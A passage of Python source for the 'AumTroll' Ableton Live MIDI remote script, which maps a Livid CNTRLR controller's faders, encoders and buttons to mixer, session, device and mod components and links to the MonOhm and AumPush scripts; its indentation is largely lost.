assert isinstance(button, ButtonElement or FlashingButtonElement)
identify_sender = True
button.add_value_listener(self._mode_value, identify_sender)
self._modes_buttons.append(button)
def number_of_modes(self):
return 5
def set_mode(self, mode):
assert isinstance(mode, int)
mode += 1
assert (mode in range(self.number_of_modes()))
if (self._mode_index != mode):
self._mode_index = mode
self.update()
elif (self._mode_index != 0):
self._mode_index = 0
self.update()
def _mode_value(self, value, sender):
assert (len(self._modes_buttons) > 0)
assert isinstance(value, int)
assert isinstance(sender, ButtonElement)
assert (self._modes_buttons.count(sender) == 1)
if ((value is not 0) or (not sender.is_momentary())):
self.set_mode(self._modes_buttons.index(sender))
class AumTrollDetailViewController(DetailViewControllerComponent):
def __init__(self, script, *a, **k):
super(AumTrollDetailViewController, self).__init__(*a, **k)
self._script = script
def _nav_value(self, value, sender):
super(AumTrollDetailViewController, self)._nav_value(value, sender)
if (self.is_enabled() and (not self._shift_pressed)):
if ((not sender.is_momentary()) or (value != 0)):
modifier_pressed = True
if not ((not self.application().view.is_view_visible('Detail')) or (not self.application().view.is_view_visible('Detail/DeviceChain'))):
self._script._update_selected_device()
class AumTroll(Cntrlr):
__module__ = __name__
__doc__ = " MonOhmod companion controller script "
def __init__(self, *a, **k):
self._monohm = None
self._aumpush = None
self._shifted = False
self._use_pedal = True
self._suppress_next_mod_display = False
self._monomod_version = 'b995'
self._codec_version = 'b995'
super(AumTroll, self).__init__(*a, **k)
"""these need to be moved into the _setup_mod() method of CNTRLR"""
self._client = None
self._active_client = None
self._host_name = "AumTroll"
with self.component_guard():
self._setup_alt_device_control()
self._setup_alt_mixer()
self._setup_pedal()
self._setup_device_selector()
#self._setup_alt_device_control()
#self.schedule_message(3, self._session._do_show_highlight)
self._send_midi(tuple(request_snapshot))
"""script initialization methods"""
def _open_log(self):
self.log_message("<<<<<<<<<<<<<<<<<<<<= " + str(self._host_name) + " " + str(self._monomod_version) + " log opened =>>>>>>>>>>>>>>>>>>>")
self.show_message(str(self._host_name) + ' Control Surface Loaded')
"""this section sets up the host environment that allows the controller to access different mods from the modButtons"""
def _setup_mod(self):
self._host = AumTrollMonomodComponent(self) #the MonomodComponent is the bridge between the CNTRLR's controls and the client patches that connect to m4l
self._host.name = 'Monomod_Host' #name it so we can access it
self.hosts = [self._host]
self._host._set_parameter_controls(self._encoder)
"""since there are many different configurations possible with the modButtons, we'll need to create a ModeSelectorComponent"""
"""to manage the different states of our controller"""
def _setup_modes(self):
self._shift_mode = ShiftModeComponent(self, self.shift_update) #here we call a new component by passing this module and its shift_update method
self._shift_mode.name = 'Mod_Mode' #name it so we can access it
self._shift_mode.set_mode_buttons([self._encoder_button[index] for index in range(4)]) #set the mode buttons that we will use to change states
self._monohm_shift = self._create_monohm_shift()
self._last_client = None
def _setup_switchboard(self):
pass
def _setup_device_selector(self):
self._device_selector = AumTrollDeviceSelectorComponent(self)
self._device_selector.name = 'Device_Selector'
"""cntrlr modes"""
"""here we set up some methods that will be used to update the control assignments when we change between different modes"""
"""this method is called everytime we change modes. If we make any assignments in the other mode assignment methods, we"""
"""have to be sure to remove them in this function. This creates a 'blank slate' for all the CNTRLRs control elements"""
def deassign_live_controls(self):
#for index in range(4):
# if self._encoder[index].value_has_listener(self._client[index]._mod_dial_value):
# self._encoder[index].remove_value_listener(self._client[index]._mod_dial_value)
#self.log_message('deassign live controls')
#self._device_selector.set_mode_buttons(None)
self._leds_last = None
self._device_selector.set_enabled(False)
self._device._parameter_controls = None
self._deassign_monomodular_controls()
self._device1._parameter_controls = None
self._device2._parameter_controls = None
for index in range(8):
self._mixer2.channel_strip(index).set_select_button(None)
self._mixer2.channel_strip(index).set_volume_control(None)
for index in range(4):
self._mixer3.channel_strip(index).set_select_button(None)
self._mixer3.channel_strip(index).set_volume_control(None)
self._mixer3.return_strip(index).set_volume_control(None)
if self._aumpush:
self._aumpush._host._set_bank_buttons(None)
self._on_shift_button_value.subject = None
self._mixer.set_crossfader_control(None)
"""THIS SECTION IS MISSING FROM THE ORIGINAL SCRIPT AND NEEDS TO BE FIXED...THE ASSIGNMENTS WERE MADE AT __init__"""
		for index in range(4):
			self._mixer.channel_strip(index).set_volume_control(None)	#release the volume faders from our four channel strips
		for index in range(2):
			self._mixer.return_strip(index).set_volume_control(None)	#release the faders that controlled our return strip volumes
		self._mixer.master_strip().set_volume_control(None)	#release the fader that controlled our master channel strip
		self._mixer.set_prehear_volume_control(None)	#release the fader that controlled the prehear volume of the master channel strip
for index in range(4): #for the left side of the mixer
self._mixer.channel_strip(index).set_solo_button(None) #remove the solo button assignments
self._mixer.channel_strip(index).set_arm_button(None) #remove the arm button assignments
self._mixer.channel_strip(index).set_mute_button(None) #remove the mute button assignments
self._mixer.channel_strip(index).set_select_button(None) #remove the select button assignments
for column in range(4):
for row in range(4):
self._scene[row].clip_slot(column).set_launch_button(None) #remove the clip launch assignments
self._send_reset.set_buttons(tuple([None for index in range(4)])) #remove the send_reset button assignments - this has to be sent as a tuple
self._session.set_stop_track_clip_buttons(None) #remove the clip_stop button assignments
self._session.set_track_bank_buttons(None, None) #set the track bank buttons for the Session navigation controls
self._session.set_scene_bank_buttons(None, None) #set the scnee bank buttons for the Session navigation controls
self._transport.set_play_button(None) #remove the play button assignment
self._transport.set_record_button(None) #remove the record button assignment
self._transport.set_stop_button(None) #remove the stop button assignment
for index in range(16):
self._grid[index].set_on_off_values(127, 0) #reset the on/off values of the grid buttons
self._grid[index].reset() #turn the buttons LEDs off
for index in range(32):
self._button[index].set_on_off_values(127, 0) #reset the on/off values for the key buttons
self._button[index].release_parameter() #remove the parameter assignment that was assigned to the keys
self._button[index].send_value(0, True) #turn the buttons LEDs off
#self._host._release_mod_dials()
#self._device.set_parameter_controls(tuple([self._encoder[index+4] for index in range(8)])) #assign the encoders from the device component controls - we are doing this here b
self._device_navigator.set_device_nav_buttons(None, None) #remove the assignment of the device nav buttons
self._device_navigator.set_enabled(False) #turn off the device navigator
self._device.set_on_off_button(None) #remove the assignment of the on/off button from the device component
self._device.set_lock_button(None) #remove the assignment of the lock button from the device component
self._device.set_bank_nav_buttons(None, None) #remove the assignment of the navigation buttons from the device component
self._device.set_enabled(False) #turn off the device component
self._session.set_enabled(False) #turn off the session component
self._session_zoom.set_enabled(False) #turn off the zoom component
for index in range(16):
self._grid[index].force_next_send() #set the last_sent value of the grid to -1, so that the next value it receives will always be transmitted to the CNTRLR
for index in range(32):
self._button[index].force_next_send() #set the last_sent value of the keys to -1, so that the next value it receives will always be transmitted to the CNTRLR
for index in range(12):
self._device._parameter_controls = None
self._encoder[index].release_parameter()
self._encoder[index].send_value(0, True) #turn off all the encoder rings. We send it the second argument, True, so that it is forced to update regardless of its last_sent property
self._encoder[index].force_next_send() #set the last_sent value of the encoder rings to -1, so that the next value it receives will always be transmitted to the CNTRLR
for index in range(8):
self._encoder_button[index+4].send_value(0, True) #turn off all the encoder LEDs. We send it the second argument, True, so that it is forced to update regardless of its last_sent property
self._encoder_button[index+4].force_next_send() #set the last_sent value of the encoder LEDs to -1, so that the next value it receives will always be transmitted to the CNTRLR
        for index in range(8):
            self._mixer2.channel_strip(index).set_select_button(None)
            self._mixer2.channel_strip(index).set_mute_button(None)
self._session_zoom.set_zoom_button(None) #remove the assignment of the shift button from the ZoomingComponent
self.request_rebuild_midi_map() #now that we've finished deassigning all of our controls, we tell the main script to rebuild its MIDI map and update the values in Live
"""this assigns the CNTRLR's controls on the main mode the CNTRLR script boots up in"""
"""if you're trying to customize your layout, this is probably where you want to concentrate"""
def assign_live_controls(self):
"""the following lines update all of the controls' last_sent properties, so that they forward the next value they receive regardless of whether or not it is the same as the last it recieved"""
"""we also reset the encoder rings and buttons, since the device component will not update them if it is not locked to a device in Live"""
for index in range(16):
self._grid[index].force_next_send()
for index in range(32):
self._button[index].force_next_send()
for index in range(8):
self._encoder_button[index+4].send_value(0, True)
self._encoder_button[index+4].force_next_send()
for index in range(12):
self._encoder[index].send_value(0, True)
self._encoder[index].force_next_send()
"""here we assign the top encoders to the mod_dial, if it exists, in any connected mods"""
#self.schedule_message(4, self._host._assign_mod_dials)
self._host._assign_mod_dials()
"""here we assign the left side of our mixer's buttons on the lower 32 keys"""
if self._monohm == None and self._aumpush == None:
            for index in range(4): #loop over all four of our track channel strips' controls
self._button[index].set_on_value(SOLO[self._rgb]) #set the solo color from the Map.py
self._mixer.channel_strip(index).set_solo_button(self._button[index]) #assign the solo buttons to our mixer channel strips
self._button[index+4].set_on_value(ARM[self._rgb]) #set the arm color from the Map.py
self._mixer.channel_strip(index).set_arm_button(self._button[index+4]) #assign the arm buttons to our mixer channel strips
self._button[index+16].set_on_value(MUTE[self._rgb]) #set the mute color from the Map.py
self._mixer.channel_strip(index).set_mute_button(self._button[index+16]) #assign the mute buttons to our mixer channel strips
self._button[index+20].set_on_value(SELECT[self._rgb]) #set the select color from the Map.py
self._mixer.channel_strip(index).set_select_button(self._button[index+20]) #assign the select buttons to our mixer channel strips
            self._send_reset.set_buttons(tuple(self._button[index + 8] for index in range(4))) #this is yet another way to quickly assign multiple elements conveniently in-place: a generator expression inside the call. The tuple() method creates an immutable sequence, so it can't be modified until it gets where it's going and is unpacked.
self._session.set_stop_track_clip_buttons(tuple(self._button[index+24] for index in range(4))) #these last two lines assign the send_reset buttons and the stop_clip buttons for each track
for index in range(4):
self._button[index+8].send_value(SEND_RESET[self._rgb], True) #now we are going to send a message to turn the LEDs on for the send_reset buttons
                self._button[index + 24].set_on_off_values(STOP_CLIP[self._rgb], STOP_CLIP[self._rgb]) #this assigns the custom colors defined in the Map.py file to the stop_clip buttons. They have separate on/off values, but we assign them both the same value so we can always identify them
self._button[index+24].send_value(STOP_CLIP[self._rgb], True) #finally, we send the on/off colors out to turn the LEDs on for the stop clip buttons
            self._button[28].set_on_off_values(PLAY_ON[self._rgb], PLAY[self._rgb]) #assign the on/off colors for play. These are two separate values, depending on whether play is engaged or not
self._transport.set_play_button(self._button[28]) #set the transports play control to the corresponding button on the CNTRLR
self._button[30].set_on_off_values(RECORD_ON[self._rgb], RECORD[self._rgb]) #set the on/off colors for the transport record buttons
self._transport.set_record_button(self._button[30]) #assign the correct button for the transport record control
self._button[29].set_on_value(STOP[self._rgb]) #set the on value for the Stop button
self._transport.set_stop_button(self._button[29]) #assign the correct button for the transport stop control
            self._button[29].send_value(STOP_OFF[self._rgb], True) #light the stop button's LED with its idle color
for index in range(4): #set up a for loop to generate an index for assigning the session nav buttons' colors
self._button[index + 12].set_on_off_values(SESSION_NAV[self._rgb], SESSION_NAV_OFF[self._rgb]) #assign the colors from Map.py to the session nav buttons
self._session.set_track_bank_buttons(self._button[15], self._button[14]) #set the track bank buttons for the Session navigation controls
            self._session.set_scene_bank_buttons(self._button[13], self._button[12]) #set the scene bank buttons for the Session navigation controls
"""this section assigns the grid to the clip launch functionality of the SessionComponent"""
            for column in range(4): #a nested loop generates the indexes needed to assign the grid buttons
                for row in range(4): #the outer loop supplies the column index, the inner loop the row index
self._scene[row].clip_slot(column).set_launch_button(self._grid[(row*4)+column]) #we use the indexes to grab the first the scene and then the clip we assigned above, and then we use them again to define the button held in the grid array that we want to assign to the clip slot from the session component
"""this section assigns the faders and knobs"""
for index in range(2):
self._mixer.return_strip(index).set_volume_control(self._fader[index+4]) #assign the right faders to control the volume of our return strips
self._mixer.master_strip().set_volume_control(self._fader[7]) #assign the far right fader to control our master channel strip
self._mixer.set_prehear_volume_control(self._fader[6]) #assign the remaining fader to control our prehear volume of the the master channel strip
            for track in range(4): #loop over all four of our track channel strips' controls
channel_strip_send_controls = [] #the channelstripcomponent requires that we pass the send controls in an array, so we create a local variable, channel_strip_send_controls, to hold them
                for control in range(2): #since we are going to assign two controls to the sends, we use a short loop
                    channel_strip_send_controls.append(self._dial_left[track + (control * 4)]) #and use the list's append method to add them to the array
self._mixer.channel_strip(track).set_volume_control(self._fader[track]) #Since we gave our mixer 4 tracks above, we'll now assign our fader controls to it
self._mixer.channel_strip(track).set_send_controls(tuple(channel_strip_send_controls)) #now that we have an array containing the send controls, we pass it to the channelstrip component with its set_send_controls() method
                self._mixer.channel_strip(track).set_pan_control(self._dial_left[track + 8]) #now we set the pan control to the bottom row of left-hand dials
                self._mixer.track_eq(track).set_gain_controls(tuple([self._dial_right[track+8], self._dial_right[track+4], self._dial_right[track]])) #here's another way of doing the same thing, but instead of creating the array beforehand, we define it in-place. It's probably bad coding to mix styles like this, but I'll leave it for those of you trying to figure this stuff out
self._mixer.track_eq(track).set_enabled(True) #turn the eq component on
self._session_zoom.set_zoom_button(self._button[31]) #assign the lower right key button to the shift function of the Zoom component
self._session.update() #tell the Session component to update so that the grid will display the currently selected session region
self._session.set_enabled(True) #enable the Session Component
self._session_zoom.set_enabled(True) #enable the Session Zoom
elif not self._aumpush == None:
self.assign_aumpush_controls()
elif not self._monohm == None:
for index in range(8):
self._mixer2.channel_strip(index).set_volume_control(self._fader[index])
self._mixer2.set_track_offset(TROLL_OFFSET)
self._device_selector.set_mode_buttons(tuple(self._grid))
self._device_selector.set_enabled(True)
if not self._shifted:
self._assign_monomodular_controls()
else:
self._assign_shifted_controls()
self._device1.set_parameter_controls(tuple([self._knobs[index] for index in range(8)]))
self._device2.set_parameter_controls(tuple([self._knobs[index+12] for index in range(8)]))
self._device1.set_enabled(True)
self._device2.set_enabled(True)
self._find_devices()
self._device1.update()
self._device2.update()
"""this section assigns the encoders and encoder buttons"""
if self._aumpush == None:
            self._device.set_parameter_controls(tuple([self._encoder[index+4] for index in range(8)])) #assign the encoders to the device component's controls
self._encoder_button[7].set_on_value(DEVICE_LOCK[self._rgb]) #set the on color for the Device lock encoder button
self._device.set_lock_button(self._encoder_button[7]) #assign encoder button 7 to the device lock control
self._encoder_button[4].set_on_value(DEVICE_ON[self._rgb]) #set the on color for the Device on/off encoder button
            self._device.set_on_off_button(self._encoder_button[4]) #assign encoder button 4 to the device on/off control
            for index in range(2): #loop to generate indexes so that we can reference the correct controls to assign to the device_navigator functions
self._encoder_button[index + 8].set_on_value(DEVICE_NAV[self._rgb]) #assign the on color for the device navigator
self._encoder_button[index + 10].set_on_value(DEVICE_BANK[self._rgb]) #assign the on color for the device bank controls
self._device_navigator.set_device_nav_buttons(self._encoder_button[10], self._encoder_button[11]) #set the device navigators controls to encoder buttons 10 and 11
self._device.set_bank_nav_buttons(self._encoder_button[8], self._encoder_button[9]) #set the device components bank nav controls to encoder buttons 8 and 9
"""now we turn on and update some of the components we've just made assignments to"""
self._device.set_enabled(True) #enable the Device Component
self._device_navigator.set_enabled(True) #enable the Device Navigator
            self._device.update() #tell the Device component to update its assignments so that it will detect the currently selected device parameters and display them on the encoder rings
"""this assigns the CNTRLR's controls on for 4th empty modSlot"""
"""these assignments mirror the main section; commenting is restricted to the differences"""
def assign_chopper_controls(self):
"""the following lines update all of the controls' last_sent properties, so that they forward the next value they receive regardless of whether or not it is the same as the last it recieved"""
"""we also reset the encoder rings and buttons, since the device component will not update them if it is not locked to a device in Live"""
for index in range(16):
self._grid[index].force_next_send()
for index in range(32):
self._button[index].force_next_send()
for index in range(8):
self._encoder_button[index+4].send_value(0, True)
self._encoder_button[index+4].force_next_send()
for index in range(12):
self._encoder[index].send_value(0, True)
self._encoder[index].force_next_send()
"""here we assign the top encoders to the mod_dial, if it exists, in any connected mods"""
#self.schedule_message(4, self._host._assign_mod_dials)
self._host._assign_mod_dials()
"""the following lines differ from the assignments in self.assign_live_controls()"""
"""the assignments merely moving certain elements from their original positions"""
for index in range(4):
self._button[index].set_on_value(MUTE[self._rgb])
self._mixer.channel_strip(index).set_mute_button(self._button[index])
self._button[index+4].set_on_value(SELECT[self._rgb])
self._mixer.channel_strip(index).set_select_button(self._button[index+4])
self._session.set_stop_track_clip_buttons(tuple(self._button[index+8] for index in range(4)))
for index in range(4):
self._button[index + 8].set_on_off_values(STOP_CLIP[self._rgb], STOP_CLIP[self._rgb])
self._button[index+8].send_value(STOP_CLIP[self._rgb], True)
for index in range(4):
self._button[index + 12].set_on_off_values(SESSION_NAV[self._rgb], SESSION_NAV_OFF[self._rgb])
self._session.set_scene_bank_buttons(self._button[13], self._button[12])
self._session.set_track_bank_buttons(self._button[15], self._button[14])
"""the rest of this method mirrors self._assign_live_controls, comments can be found there"""
for index in range(2):
self._mixer.return_strip(index).set_volume_control(self._fader[index+4])
self._mixer.master_strip().set_volume_control(self._fader[7])
self._mixer.set_prehear_volume_control(self._fader[6])
for track in range(4):
channel_strip_send_controls = []
for control in range(2):
channel_strip_send_controls.append(self._dial_left[track + (control * 4)])
self._mixer.channel_strip(track).set_send_controls(tuple(channel_strip_send_controls))
self._mixer.channel_strip(track).set_pan_control(self._dial_left[track + 8])
            self._mixer.track_eq(track).set_gain_controls(tuple([self._dial_right[track+8], self._dial_right[track+4], self._dial_right[track]]))
self._mixer.track_eq(track).set_enabled(True)
for column in range(4):
for row in range(4):
self._scene[row].clip_slot(column).set_launch_button(self._grid[(row*4)+column])
self._encoder_button[7].set_on_value(DEVICE_LOCK[self._rgb])
self._device.set_lock_button(self._encoder_button[7])
self._encoder_button[4].set_on_value(DEVICE_ON[self._rgb])
self._device.set_on_off_button(self._encoder_button[4])
for index in range(2):
self._encoder_button[index + 8].set_on_value(DEVICE_NAV[self._rgb])
self._encoder_button[index + 10].set_on_value(DEVICE_BANK[self._rgb])
self._device_navigator.set_device_nav_buttons(self._encoder_button[10], self._encoder_button[11])
self._device.set_bank_nav_buttons(self._encoder_button[8], self._encoder_button[9])
self._device.set_enabled(True)
self._device_navigator.set_enabled(True)
self._session.set_enabled(True)
self._session_zoom.set_enabled(True)
self._device.update()
self._session.update()
self.request_rebuild_midi_map()
"""function mode callbacks"""
"""this method changes modes when we press a modButton. It is also called from Monomod when it needs to update the modDial assignments"""
def shift_update(self):
#self.log_message('shift_update')
#deassign current assignments and reset channel translation to 0
        self.assign_alternate_mappings(0) #first, we remove any channel reassignments we might have made by assigning alternate mappings, but to channel 0 (the original channel)
self._chopper.set_enabled(False) #disable the chopper, we will enable it later if we are in chopper mode
#update top button row to reflect current mode
        if self._shift_mode._mode_index == 0: #if the shift mode is 0, meaning we've selected the main script mode:
self._host._set_dial_matrix(None, None) #deassign the Monomod Components dial matrix
#self._host._set_knobs(None)
self._host._set_button_matrix(None) #deassign the Monomod Component's button matrix
self._host._set_key_buttons(None) #deassign the Monomod Component's key matrix
self._host.set_enabled(False) #disable the Monomod Component
#self.set_local_ring_control(1) #send sysex to the CNTRLR to put it in local ring mode
self.deassign_live_controls()
#self.assign_live_controls() #assign our top level control assignments
self.schedule_message(1, self.assign_live_controls)
self.schedule_message(1, self._host._display_mod_colors)
        elif CHOPPER_ENABLE and self._host._client is not None and not self._host._client[3].is_connected() and self._shift_mode._mode_index == 4: #if the fourth mod button has been pressed and there is no mod installed in that slot
self.deassign_live_controls() #deassign the top level assignments
#self.schedule_message(4, self._host._assign_mod_dials)
self._host._assign_mod_dials()
self._host._set_dial_matrix(None, None) #deassign the Monomod Components dial matrix
self._host._set_button_matrix(None) #deassign the Monomod Component's button matrix
self._host._set_key_buttons(None) #deassign the Monomod Component's key matrix
self._host.set_enabled(False) #disable the Monomod Component
self.set_local_ring_control(1) #send sysex to the CNTRLR to put it in local ring mode
self.assign_chopper_controls() #assign the controls for the Chopper Component
self._chopper.set_enabled(True) #turn the Chopper Component on
self._host._display_mod_colors()
self._shift_mode._modes_buttons[3].send_value(8) #turn on the LED below the modButton
else: #otherwise, if we are in modMode
self.deassign_live_controls() #remove all of our assignments from the controls and refresh their caches
if self._aumpush == None:
for index in range(8):
self._mixer2.channel_strip(index).set_volume_control(self._fader[index])
self._mixer2.set_track_offset(TROLL_OFFSET)
self._device1.set_parameter_controls(tuple([self._knobs[index] for index in range(8)]))
self._device2.set_parameter_controls(tuple([self._knobs[index+12] for index in range(8)]))
self._device1.set_enabled(True)
self._device2.set_enabled(True)
self._find_devices()
self._device1.update()
self._device2.update()
else:
self.assign_aumpush_controls()
if self._host._client is None or not self._host._client[self._shift_mode._mode_index-1].is_connected(): #if there is not a mod in the currently selected modSlot
            self.assign_alternate_mappings(self._shift_mode._mode_index) #assign a different MIDI channel that the controls are translated to when entering Live
for index in range(4):
self._shift_mode._modes_buttons[index].send_value(self._shift_mode._mode_index == (index+1))
else:
self._host._set_button_matrix(self._matrix) #assign the 4x4 to it
self._host._set_dial_matrix(self._dial_matrix, self._dial_button_matrix) #assign the encoders to it
            if not self._shifted:
#self.log_message('setting keys')
self._host._set_key_buttons(tuple(self._button)) #assign the lower buttons to it
if(self._host._active_client._monomodular > 0):
if self._aumpush is None:
#self.log_message('but monomod > 0')
self._assign_monomodular_controls()
else:
#self.log_message('self._shifted is True')
self._host._set_key_buttons(None)
self._assign_shifted_controls()
self._host._select_client(self._shift_mode._mode_index-1) #select the client corresponding to the button we pressed
if self._suppress_next_mod_display:
self._suppress_next_mod_display = False
else:
self._host.display_active_client() #tell Monomod Component to update the LEDs on the CNTRLR corresponding to the client that is selected
self._host.set_enabled(True) #turn on the Monomod Component
self._host._display_mod_colors()
def find_inputs(self):
found_device = None
tracks = self.song().tracks
for track in tracks:
if track.name == 'Inputs':
for device in track.devices:
if bool(device.can_have_chains) and device.name == 'Inputs':
found_device = device
return found_device
def find_perc_crossfader(self):
found_parameter = None
tracks = self.song().tracks
for track in tracks:
if track.name == 'Perc':
for device in track.devices:
if bool(device.can_have_chains) and device.name == 'Perc':
for parameter in device.parameters:
if parameter.name == 'XFade':
found_parameter = parameter
return found_parameter
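    # Usage note (an assumption about the target Live set, which is not shown
    # here): find_inputs() expects a track literally named 'Inputs' holding a Rack
    # device of the same name, and find_perc_crossfader() expects a 'Perc' track
    # with a 'Perc' Rack whose macro is labelled 'XFade'; both return None when
    # nothing matches.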
def assign_aumpush_controls(self):
if self._aumpush:
inputs = self.find_inputs()
            if inputs is not None:
for index in range(4):
self._knobs[index+8].connect_to(inputs.parameters[index+1])
#for index in range(3):
# self._mixer2.channel_strip(index+4).set_volume_control(self._knobs[index+20])
self._mixer.set_crossfader_control(self._knobs[23])
xfade = self.find_perc_crossfader()
            if xfade is not None:
self._knobs[20].connect_to(xfade)
for index in range(4):
self._mixer3.return_strip(index).set_volume_control(self._encoder[index+4])
self._encoder_button[index+4].send_value(127, True)
            if self._shift_mode._mode_index == 0:
self._on_shift_button_value.subject = self._grid[15]
if self._aumpush._host._is_connected:
self._aumpush._host._set_bank_buttons(tuple(self._button[4:12]+self._button[20:28]))
#for index in range(8):
# self._button[index+4].set_on_off_values(SELECT[self._rgb], (5, 6)[int(index>3)])
# self._mixer2.channel_strip(index).set_select_button(self._button[index+4])
            self._send_reset.set_buttons(tuple(self._encoder_button[4:8])) #hoisted out of the loop below: it assigns the same four buttons and only needs to run once
            for index in range(4):
self._button[index].set_on_off_values(SELECT[self._rgb], 1)
self._mixer.channel_strip(index).set_select_button(self._button[index])
self._mixer.channel_strip(index).set_mute_button(self._button[index+16])
self._button[index+12].set_on_off_values(SELECT[self._rgb], 1)
self._mixer2.channel_strip(index).set_select_button(self._button[index+12])
self._mixer2.channel_strip(index).set_mute_button(self._button[index+28])
if not self._shifted:
self._mixer.selected_strip().set_send_controls(self._encoder[8:12])
for index in range(4):
self._encoder_button[index+8].send_value(3, True)
else:
self._mixer.return_strip(0).set_send_controls(tuple([None, self._encoder[8]]))
self._mixer.return_strip(1).set_send_controls(tuple([self._encoder[9], None]))
#self._mixer.set_crossfader_control(self._encoder[11])
self._mixer3.channel_strip(0).set_volume_control(self._encoder[11])
self._encoder_button[8].send_value(5, True)
self._encoder_button[9].send_value(5, True)
self._encoder_button[11].send_value(1, True)
for index in range(4):
self._mixer.channel_strip(index).set_volume_control(self._fader[index])
self._mixer2.channel_strip(index).set_volume_control(self._fader[index+4])
self._device1.set_parameter_controls(tuple([self._knobs[index] for index in range(8)]))
self._device2.set_parameter_controls(tuple([self._knobs[index+12] for index in range(8)]))
self._device1.set_enabled(True)
self._device2.set_enabled(True)
self._find_devices()
self._device1.update()
self._device2.update()
self._device_selector.set_mode_buttons(tuple(self._grid[:15]))
self._device_selector.set_enabled(True)
self._device_selector.update()
self.request_rebuild_midi_map()
"""used to connect different control_surfaces so that they can communicate"""
def connect_script_instances(self, instanciated_scripts):
if AUMPUSH_LINK is True:
link = False
for s in instanciated_scripts:
#self.log_message('script check' + str(s))
                if not link:
#self.log_message(str(type(s)))
if '_cntrlr_version' in dir(s):
if s._cntrlr_version == self._monomod_version and s._host_name == 'AumPush':
link = True
with self.component_guard():
self._connect_aumpush(s)
break
elif MONOHM_LINK is True:
link = False
for s in instanciated_scripts:
#self.log_message('script check' + str(s))
                if not link:
#self.log_message(str(type(s)))
if '_cntrlr_version' in dir(s):
if s._cntrlr_version == self._monomod_version:
link = True
with self.component_guard():
self._connect_monohm(s)
break
"""device component methods and overrides"""
"""this closure replaces the default DeviceComponent update() method without requiring us to build an override class"""
"""it calls the _update_selected_device method of this script in addition to its normal routine"""
"""it also ensures a rebuilt midi_map; for some reason the Abe's pulled that part out of the post 8.22 scripts, and under certain circumstances"""
"""things don't work as expected anymore."""
def _device_update(self, device):
def _update():
#for client in self._client:
# if (device._device != None) and (client.device == device._device):
# device._bank_index = max(client._device_component._cntrl_offset, device._bank_index)
DeviceComponent.update(device)
self.request_rebuild_midi_map()
return _update
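    # A hedged wiring sketch (an assumption -- the actual binding happens elsewhere
    # in this script): these factory methods return closures that are monkey-patched
    # onto component instances, e.g.
    #   self._device.update = self._device_update(self._device)
    #   self._device.set_device = self._device_set_device(self._device)
    # extending the stock _Framework behaviour without declaring a subclass.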
def _device_set_device(self, device_component):
def set_device(device):
is_monodevice = False
for client in self._client:
if (device != None) and (client.device == device):
is_monodevice = client
if is_monodevice != False:
#device = client._device_component._device
#self.log_message('is monodevice' + str(device.name))
assert ((device == None) or isinstance(device, Live.Device.Device))
if ((not device_component._locked_to_device) and (device != device_component._device)):
if (device_component._device != None):
device_component._device.remove_name_listener(device_component._on_device_name_changed)
device_component._device.remove_parameters_listener(device_component._on_parameters_changed)
parameter = device_component._on_off_parameter()
if (parameter != None):
parameter.remove_value_listener(device_component._on_on_off_changed)
if (device_component._parameter_controls != None):
for control in device_component._parameter_controls:
control.release_parameter()
device_component._device = device
if (device_component._device != None):
device_component._bank_index = 0
                        device_component._device.add_name_listener(device_component._on_device_name_changed) #symmetric with the remove_*_listener calls above
                        device_component._device.add_parameters_listener(device_component._on_parameters_changed)
parameter = device_component._on_off_parameter()
if (parameter != None):
parameter.add_value_listener(device_component._on_on_off_changed)
for key in device_component._device_bank_registry.keys():
if (key == device_component._device):
device_component._bank_index = device_component._device_bank_registry.get(key, 0)
del device_component._device_bank_registry[key]
break
device_component._bank_name = '<No Bank>' #added
device_component._bank_index = max(is_monodevice._cntrl_offset, device_component._bank_index)
device_component._on_device_name_changed()
device_component.update()
else:
DeviceComponent.set_device(device_component, device)
return set_device
"""this closure replaces the default ChannelStripComponent _on_cf_assign_changed() method without requiring us to build an override class"""
"""it allows us to change different colors to its assigned controls based on the crossfade assignment, which the default _Framework doesn't support"""
def mixer_on_cf_assign_changed(self, channel_strip):
def _on_cf_assign_changed():
if (channel_strip.is_enabled() and (channel_strip._crossfade_toggle != None)):
if (channel_strip._track != None) and (channel_strip._track in (channel_strip.song().tracks + channel_strip.song().return_tracks)):
if channel_strip._track.mixer_device.crossfade_assign == 1: #modified
channel_strip._crossfade_toggle.turn_off()
elif channel_strip._track.mixer_device.crossfade_assign == 0:
channel_strip._crossfade_toggle.send_value(1)
else:
channel_strip._crossfade_toggle.send_value(2)
return _on_cf_assign_changed
"""a closure fix for banking when we deassign the bank buttons and still want to change bank indexes"""
def device_is_banking_enabled(self, device):
def _is_banking_enabled():
return True
return _is_banking_enabled
"""alt_build methods used when Monomodular capable controller is used in conjunction with the CNTRLR"""
"""monohm connectivity methods"""
"""this is called by connect_script_instances() when a MonOhm script is found to be installed"""
def _connect_monohm(self, monohm):
self.log_message('_connect_monohm')
self._monohm = monohm
self._monohm._cntrlr = self
self._mixer2.set_track_offset(TROLL_OFFSET)
#self.set_device_component(self._monohm._device)
"""if '_monohm_shift' in dir(monohm):
if self._monohm._shift_mode.mode_index_has_listener(monohm._monohm_shift):
self._monohm._shift_mode.remove_mode_index_listener(monohm._monohm_shift)
else:
monohm._monohm_shift = lambda: self._monohm_shift
self._monohm._shift_mode.add_mode_index_listener(monohm._monohm_shift)"""
#self._monohm._r_function_mode.set_enabled(True)
self._monohm._shift_mode._mode_index = 3
self._monohm._shift_mode.update()
self._monohm._r_function_mode._mode_index = TROLL_RIGHT_MODE
self._monohm._r_function_mode.update()
self._monohm._shift_mode._mode_index = 0
self._monohm._session_main.set_offsets(TROLL_MAIN_OFFSET, self._monohm._session_main._scene_offset)
self._monohm.schedule_message(10, self._monohm._shift_mode.update)
#self.deassign_live_controls()
#self.shift_update()
self._monohm_shift(0)
"""this is called by connect_script_instances() when a AumPush script is found to be installed"""
def _connect_aumpush(self, aumpush):
self.log_message('AumTroll connecting to AumPush...')
self._aumpush = aumpush
self._aumpush._cntrlr = self
with self.component_guard():
self.deassign_live_controls()
self.schedule_message(3, self.assign_live_controls)
#self._device_selector.update = self._make_device_selector_update(self._device_selector)
def _make_device_selector_update(self, selector):
def update():
key = str('p'+ str(selector._mode_index + 1) + ' ')
preset = None
for track in range(len(self.song().tracks)):
for device in range(len(self.song().tracks[track].devices)):
if(match(key, str(self.song().tracks[track].devices[device].name)) != None):
preset = self.song().tracks[track].devices[device]
for return_track in range(len(self.song().return_tracks)):
for device in range(len(self.song().return_tracks[return_track].devices)):
if(match(key, str(self.song().return_tracks[return_track].devices[device].name)) != None):
preset = self.song().return_tracks[return_track].devices[device]
for device in range(len(self.song().master_track.devices)):
